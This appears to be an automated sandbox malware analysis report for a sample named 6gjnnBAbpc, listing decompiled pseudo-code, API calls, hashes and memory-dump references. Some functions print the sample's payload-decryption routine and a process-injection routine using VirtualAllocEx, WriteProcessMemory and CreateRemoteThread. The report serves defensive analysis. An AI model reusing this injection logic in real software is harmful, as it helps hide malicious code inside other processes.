							_v12 = _v32 * 7 + _v12;
						} else {
							_v12 = _v220;
						}
						_v36 = _v12 % 4 + 9;
						E04009650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
						E04007D20( &_v92,  &_v92, 0, 0x32);
						_t104 = _t106 + 0x1c;
						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
						_v91 = 0;
						CharUpperA( &_v92);
						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
						_v12 = _v12 + 1;
						_v8 = _v8 + 1;
						_t56 = _v32 + 1;
						_v32 = _v32 + 1;
					}
				}
				return _v8;
			}

0x04009409
0x04009414
0x0400943d
0x04009442
0x04009451
0x04009454
0x04009466
0x04009480
0x0400949a
0x0400949f
0x040094a2
0x040094a9
0x040094bf
0x040094ab
0x040094b1
0x040094b1
0x040094d1
0x040094ed
0x040094fd
0x04009502
0x04009513
0x04009519
0x04009521
0x04009533
0x0400953c
0x04009545
0x04009460
0x04009463
0x04009463
0x04009466
0x04009553

APIs

Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1

lstrcpyA.KERNEL32(?,00000000), ref: 04009513
CharUpperA.USER32(?), ref: 04009521

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
String ID:
API String ID: 2710640451-0
Opcode ID: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
Instruction ID: bc5be7810042b5ebbd7ddf8470aca826c8a0736d185973949ab2100ea4ccd4f3
Opcode Fuzzy Hash: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
Instruction Fuzzy Hash: 564119B1D00208EBEB44DFD4C881BEEBBB5EF58308F10C15AD515BB281E774AA85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100021EA Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
SetLastError.KERNEL32(0000007E), ref: 1000223B
SetLastError.KERNEL32(0000000E), ref: 1000228B

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: ErrorLast$HugeRead
String ID:
API String ID: 100728148-0
Opcode ID: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
Instruction ID: 133c763f371e93ed1e981491a31024dabb451d2fe405ffdb26697d1a1c2a5393
Opcode Fuzzy Hash: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
Instruction Fuzzy Hash: 3301C975A01149EFEB04DF94C985B9EBBB5EF48354F208298E909AB255C734EF40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCA0 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,00E72558,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Alloc
String ID:
API String ID: 2773662609-0
Opcode ID: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
Instruction ID: 42ba0e2f8ca25937b9577218f0e8f1747412e3c7344b5913d50b7ca6b605e0fe
Opcode Fuzzy Hash: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
Instruction Fuzzy Hash: 3DF0AFB0204305AFD730AFB6E94520A7AE0BB44304F85893EE99567791D778540ADB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1C0 Relevance: 2.6, APIs: 2, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
Instruction ID: 9a935b580d19b4844a8e347fe3f337539f3ef189ba2f3eb9209136ab9bdebf7b
Opcode Fuzzy Hash: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
Instruction Fuzzy Hash: D3313DB0204301DFD720EF65E54435ABBE0BB40708F518C7ED8859B792D7BD9889DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 10001D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
Instruction ID: 8f4ecb97985d5e8621b4f5fb532634e6274162181c58748ea6569eeff33a15e4
Opcode Fuzzy Hash: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
Instruction Fuzzy Hash: D6418574A04109AFEB44CF44D494BEAB7B2FB88394F24C15AEC195B359D775EE82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415890 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00415890(void* __ecx, void* __eflags, intOrPtr* _a4) {
				void* _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v48;
				intOrPtr _v56;
				void* __ebx;
				void* __esi;
				void* _t32;
				signed int _t35;
				signed int _t40;
				signed int _t47;
				signed int _t53;
				void* _t54;
				signed int _t55;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t64;

				_t54 = __ecx;
				E00412210(); // executed
				_t32 = E00415320(_a4, _t54);
				if(_t32 == 0) {
					_t63 =  *_a4;
					_t35 = E00414E80(_t63);
					__eflags = _t35;
					_t53 = _t35;
					if(_t35 == 0) {
						__eflags =  *(_t63 + 8);
						if( *(_t63 + 8) != 0) {
							L12:
							 *_t64 = _t63 + 8;
							InterlockedIncrement(??);
						} else {
							_t55 =  *(_t63 + 0x10);
							_t40 =  *(_t63 + 0xc);
							__eflags = _t55;
							if(_t55 > 0) {
								_t40 = _t40 - _t55;
								__eflags = _t40;
								 *(_t63 + 0xc) = _t40;
								 *(_t63 + 0x10) = 0;
							}
							__eflags = _t40;
							if(_t40 <= 0) {
								goto L12;
							} else {
								 *(_t63 + 0x10) =  ~_t40;
								_t62 = _t63 + 0x18;
								_v40 = E00414F10;
								_v36 = _t63;
								_v32 =  *((intOrPtr*)(E00411E50()));
								asm("mfence");
								 *((intOrPtr*)(E00411E50())) =  &_v40;
								asm("mfence");
								_v48 = _t63 + 0x1c;
								while(1) {
									_v56 = _t62;
									 *_t64 = _v48;
									_t47 = E00416A70(__eflags);
									__eflags = _t47;
									if(_t47 != 0) {
										break;
									}
									__eflags =  *(_t63 + 0x10);
									if(__eflags >= 0) {
										 *((intOrPtr*)(E00411E50())) = _v32;
										 *(_t63 + 0xc) = 0;
										goto L12;
									} else {
										continue;
									}
									goto L13;
								}
								_v48 = _t47;
								 *((intOrPtr*)(E00411E50())) = _v32;
								 *_t64 = _v36;
								_v40();
								_t53 = _v48;
							}
						}
					}
					L13:
					return E00414F30(_a4, _t53, _t53, _t63);
				} else {
					return _t32;
				}
			}

0x00415890
0x00415899
0x004158a1
0x004158a8
0x004158b5
0x004158b9
0x004158be
0x004158c0
0x004158c2
0x004158cb
0x004158cd
0x00415971
0x00415974
0x00415977
0x004158d3
0x004158d3
0x004158d6
0x004158d9
0x004158db
0x004158dd
0x004158dd
0x004158df
0x004158e2
0x004158e2
0x004158e9
0x004158eb
0x00000000
0x004158f1
0x004158f3
0x004158f6
0x004158f9
0x00415900
0x0041590a
0x0041590d
0x00415918
0x0041591d
0x00415920
0x0041592c
0x0041592f
0x00415933
0x00415936
0x0041593b
0x0041593d
0x00000000
0x00000000
0x00415928
0x0041592a
0x00415968
0x0041596a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041592a
0x0041593f
0x0041594a
0x0041594f
0x00415952
0x00415958
0x00415958
0x004158eb
0x004158cd
0x00415980
0x00415991
0x004158aa
0x004158b1
0x004158b1

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
Instruction ID: 7064b4f85ec8c943a007a1c63ca079293348c6aff3994ae5daf0d86751bc83bd
Opcode Fuzzy Hash: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
Instruction Fuzzy Hash: D6310AB4A00705CFDB10EFAAD4405DEBBF4EF88354B00892AE956D7711E738A945CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004111D0 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004111D0(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v32;
				char* _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t16;
				char* _t18;
				intOrPtr* _t36;
				intOrPtr _t41;
				char* _t42;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t47;
				intOrPtr* _t48;

				_t37 = __ecx;
				_t16 = 0x16;
				_t48 = _t47 - 0x2c;
				_t36 = _a4;
				_t41 =  *_t36;
				if(_a8 != 0) {
					_t16 = 0;
					if(_t41 != 1) {
						_t18 = E0040F1C0(_t36, __ecx);
						_t3 = _t18 + 4; // 0x4
						_t46 = _t3;
						_t42 = _t18;
						 *_t48 = _t46;
						E00413FD0();
						_t44 =  *_t36;
						if(_t44 == 0) {
							_v40 = 0x40f4b0;
							_v36 = _t42;
							_t9 = E004102F0(_t36, _t37, _t41, _t42, _t44) + 0xc; // 0xc
							_t22 =  ==  ? _t44 : _t9;
							_t23 =  *((intOrPtr*)( ==  ? _t44 : _t9));
							_v32 =  *((intOrPtr*)( ==  ? _t44 : _t9));
							asm("mfence");
							_t11 = E004102F0(_t36, _t9, _t41, _t42, _t44) + 0xc; // 0xc
							_t26 =  ==  ? _t44 : _t11;
							 *((intOrPtr*)( ==  ? _t44 : _t11)) =  &_v40;
							asm("mfence");
							_a8();
							_t14 = E004102F0(_t36,  &_v40, _t41, _t42, _t44) + 0xc; // 0xc
							_t37 = _t14;
							_t45 =  !=  ? _t14 : _t44;
							 *((intOrPtr*)( !=  ? _t14 : _t44)) = _v32;
							 *_t36 = 1;
						} else {
							if(_t44 != 1) {
								_v48 = _t44;
								_v52 = _t36;
								_v56 = " once %p is %d\n";
								 *_t48 = __imp___iob + 0x40;
								fprintf(??, ??);
							}
						}
						 *_t48 = _t46;
						E00413A00(_t37);
						E0040F340(_t42);
						_t16 = 0;
					}
				}
				return _t16;
			}

0x004111d0
0x004111d1
0x004111d9
0x004111e0
0x004111e6
0x004111e8
0x004111ea
0x004111ef
0x004111f3
0x004111f8
0x004111f8
0x004111fb
0x004111fd
0x00411200
0x00411205
0x00411209
0x00411250
0x00411258
0x00411261
0x00411268
0x0041126b
0x0041126d
0x00411271
0x00411279
0x00411280
0x00411287
0x00411289
0x0041128c
0x00411295
0x00411295
0x0041129e
0x004112a1
0x004112a3
0x0041120b
0x0041120e
0x00411215
0x00411219
0x0041121d
0x00411228
0x0041122b
0x0041122b
0x0041120e
0x00411230
0x00411233
0x0041123a
0x0041123f
0x0041123f
0x004111ef
0x00411248

APIs

fprintf.MSVCRT ref: 0041122B

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: fprintf
String ID:
API String ID: 383729395-0
Opcode ID: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
Instruction ID: 9d1d22da725d0359cd3540e7da02749fe6b1af8f46904c09d6a95be390009998
Opcode Fuzzy Hash: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
Instruction Fuzzy Hash: 08219F716142108FC354EF2AC88569BB7E4EF88750F05886EF948DB311D738EC85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCC9 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
Part of subcall function 00414330: free.MSVCRT ref: 0041448D
Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1

TlsAlloc.KERNEL32(?,?,?,?,00E72558,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: AtomMutex$AllocCloseCreateFindHandleObjectReleaseSingleWaitfreemallocmemcpystrlen
String ID:
API String ID: 3969912963-0
Opcode ID: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
Instruction ID: 08ba11220197d5884c5fb90774ff7199050f09fd8405595aaced9661a87e5e57
Opcode Fuzzy Hash: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
Instruction Fuzzy Hash: 95E0DFF0204301DFC7309F66E80430677E0BB48304F54893EE8AA973A0D778540ACB8E

Uniqueness

Uniqueness Score: -1.00%

Function 10001840 Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 10001848

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
Instruction ID: e5a886dd6f7ca33b6e05a63634625ffd61cc9a463d586fd81315a615fd3f2724
Opcode Fuzzy Hash: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
Instruction Fuzzy Hash: EBD09274A0620CEBDB10DBA9D948A8EB7FDEB08291F108598E90997204DA31AF409B90

Uniqueness

Uniqueness Score: -1.00%

Function 100019F0 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,10001A51,00003000,00000004,000000BE,?,10001A51,?), ref: 10001A01

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
Instruction ID: cb2b1c577f6c2eb629580bdbf47f529d576ce8939b3be3f1cb066eb9375a85c4
Opcode Fuzzy Hash: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
Instruction Fuzzy Hash: 59D0C9B4685208BBE710CB84CC56F6ABBACD704751F004185FE089B280D5B1AE0056A1

Uniqueness

Uniqueness Score: -1.00%

Function 10001820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 1000182F

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
Instruction ID: 84b35084efcff6c5970382eaf3cd32c1c52104bf155538fafba3cb0c341aa3c2
Opcode Fuzzy Hash: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
Instruction Fuzzy Hash: E8C04C7611430CABCB04DF98DC94DAB37ADBB8C650B04C508FA1D87204C630F9108BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04008CF0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 96
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E04008CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
				int _v8;
				long* _v12;
				int _v16;
				char _v20;
				long* _v24;
				char* _t31;
				int _t32;
				intOrPtr _t34;
				long** _t35;
				char* _t52;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L15:
					return _v8;
				} else {
					_v12 = 0;
					_t31 =  *0x4013370; // 0x400c6e4
					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
					if(_t32 == 0) {
						_t32 = GetLastError();
						_v16 = _t32;
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t52 =  *0x4013370; // 0x400c6e4
							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
						if(_t32 != 0) {
							_t34 = _a16;
							__imp__CryptHashData(_v20, _a12, _t34, 0);
							if(_t34 != 0) {
								_v24 = 0;
								_t35 =  &_v24;
								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
								if(_t35 != 0) {
									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
									CryptDestroyKey(_v24);
								}
							}
							__imp__CryptDestroyHash(_v20);
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L15;
				}
			}

0x04008cf6
0x04008d01
0x04008e1a
0x04008e20
0x04008d25
0x04008d25
0x04008d35
0x04008d3f
0x04008d47
0x04008d49
0x04008d4f
0x04008d59
0x04008d6d
0x04008d78
0x04008d78
0x04008d59
0x04008d82
0x04008d99
0x04008da1
0x04008da5
0x04008db1
0x04008db9
0x04008dbb
0x04008dc2
0x04008dd5
0x04008ddd
0x04008df7
0x04008dfe
0x04008dfe
0x04008ddd
0x04008e08
0x04008e08
0x04008e14
0x04008e14
0x00000000
0x04008d82

APIs

CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008D3F
GetLastError.KERNEL32 ref: 04008D49
CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008D78
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008D99
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008DB1
CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 04008DD5
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008DF1
CryptDestroyKey.ADVAPI32(00000000), ref: 04008DFE
CryptDestroyHash.ADVAPI32(00000000), ref: 04008E08
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008E14

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D30
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D68

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 3718126946-947817771
Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
Instruction ID: a60922051ccac58686ce7bb6d252e90d8c3d4a9338f0118c5879c090c3d284f0
Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
Instruction Fuzzy Hash: E5311B75A44209EBFB58DFA4C849BAE77B9FB44704F10C628F601B61C0D7B8A984CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04002510 Relevance: 12.1, APIs: 8, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04002510(void* _a4, intOrPtr _a8) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _v28;
				void* _v32;
				signed int _v36;
				void* _t138;
				void* _t139;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L14:
					return _v8;
				} else {
					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
					_v12 =  *((intOrPtr*)(_v24 + 0x50));
					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
					if(_v16 != 0) {
						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
						if(_v32 != 0) {
							L7:
							E04007B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
							_t139 = _t138 + 0xc;
							_v36 = 0;
							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
								E04007B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
								_t139 = _t139 + 0xc;
								_v36 = _v36 + 1;
							}
							E040026D0(_v16, _v32);
							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
								VirtualFree(_v16, 0, 0x8000);
								_v28 = 0;
								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
								goto L14;
							}
							VirtualFree(_v16, 0, 0x8000);
							return 0;
						}
						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
						if(_v32 != 0) {
							goto L7;
						}
						VirtualFree(_v16, 0, 0x8000);
						return 0;
					}
					return 0;
				}
			}

0x04002516
